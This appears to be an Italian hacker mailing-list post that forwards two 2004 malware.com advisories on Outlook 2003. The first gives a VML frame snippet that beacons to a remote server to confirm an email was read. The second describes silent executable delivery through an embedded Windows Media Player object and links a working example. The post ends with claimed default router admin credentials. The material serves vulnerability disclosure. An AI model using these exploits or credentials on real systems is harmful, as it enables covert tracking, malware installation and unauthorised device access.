mi permetto di allegarvi questa analisi di Outlook, nella sua
completezza (2 msg).
a me piace tanto il modo di commentare di costui.
----------------------------------------------------------------------------------------------------------------------
Tuesday, May 11, 2004
Outlook 2003 the premier mail client from the company
called 'Microsoft' certainly appears to have a lot of security
features built into it. Cursory examination shows excellent
thought into 'spam' containment, 'security' consideration and
many other little 'things'. So much so the default rendering of
html is in so-called 'restricted zone' which disallows nearly
everything [frames, iframes, objects, scripting etc.]. In
addition 'special' spam measures are taken to disallow graphic
downloads from a remote server in html email which can be used
to verify recipients:
[screen shot: http://www.malware.com/duhlook.png 40KB]
The Key Word is: nearly
Utilising Outlook's own bizarre scheMAH ! which comprises
a 'proper' frame along with an src pointing to our remote
server, we are able to ping the server and confirm our recipient
has viewed our email. We don't require graphics or frames or
iframes to do that:
<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION:
relative; TOP: 30px; HEIGHT: 200px"
src = "http://www.malware.com/duh.txt#malware";></v:vmlframe>
<HTML>
<HEAD>
<STYLE>
v:* { behavior: url(#default#VML); }
</STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD>
Notes:
1. We now commence our examination of the Microsoft Office 2003
suite, we're a bit late, but it has taken all this time to save
up to buy the thing
2. Quick 72 hour prodding reveals that this 'perceived' premier
device known as Outlook 2003 is in fact riddled with holes
3. Do not receive or open any emails period. Use string and tin
cans if you must communicate
End Call
--
http://www.malware.com
---------------------------------------------------------------------------------------------------------------------
Monday, May 17, 2004
Technical final step to 'silent delivery and installation of an
executable on the target computer, no client input other than
reading an email' this can be achieved with the highly
touted 'secure-by-default' Outlook 2003 mail client from the
craftsman known as 'Microsoft'.
Default settings of the 'gadget' are: restricted zone which
means no active x controls, no scripting, no file downloads etc.
This can all very easily be bypassed by simply embedding in a
rich text message our OLE object, one Windows Media Player. We
then point our source url to our media file which includes or
now run-of -the mill 0s url flip and simply by previewing or
opening the email message invoke our device known as Internet
Explorer to proxy our manipulation of the recipient's machine.
In typical fashion despite the settings in the Windows Media
Player being set to 'disallow' scripting in media files, despite
Outlook 2003's 'highly' secure default setting of view html
content in the so-called 'restricted zone'; it all still works !
[screen shot: http://www.malware.com/rockitman.png 46KB]
This now all automates our process and coupling it with our
previous first step finding:
[http://www.securityfocus.com/bid/10307]
all we need to do next is our second step and embed the entire
package including the media file into the mail message and send
it along its merry way.
The whole Outlook 2003 'gadget' is broken.
Working Example:
Simply view the mail message:
http://www.malware.com/rockIT.zip
Notes:
1. Miserable selection of full screen = true can allow us to run
our 'video' in WMP full screen mode. How about that: forget
about html spam messages, now we have full screen video
advertisements on opening the mail message.
2. Tested on XP, 2K3 POP mail client settings Outlook 2003,
Exchange Server settings unknown at this time
3. Subject to initial WMP settings a notification of connection
settings can pop up, however generally dismissed at first
running of WMP along with neither yes or no selection having an
effect [as usual].
4. Firewalls should flag Outlook itself trying to escape out on
port 80. Nevertheless if all embedded no need for remote hosting.
5. Disable HTML settings or get another mail client [better of
the two as below]
6. Lots more where this came from
End Call
--
http://www.malware.com
---------------------------------------------------------------------------------------------------------
ed ora un piccolo "contributo" pubblico :
i routers pirelli in dotazione ai tecnici Telecom x provare le linee
ADSL hanno :
UID = admin
PWD = microbusinness
non so' se la cosa resta valida x default anche presso gli utenti.
saluti
$witch
_______________________________________________
hackmeeting mailing list
hackmeeting@lists.papuasia.org
http://brr.papuasia.org/cgi-bin/mailman/listinfo/hackmeeting
![[<--]](/icons/prev.gif){kind=icon}
![[-->]](/icons/next.gif){kind=icon}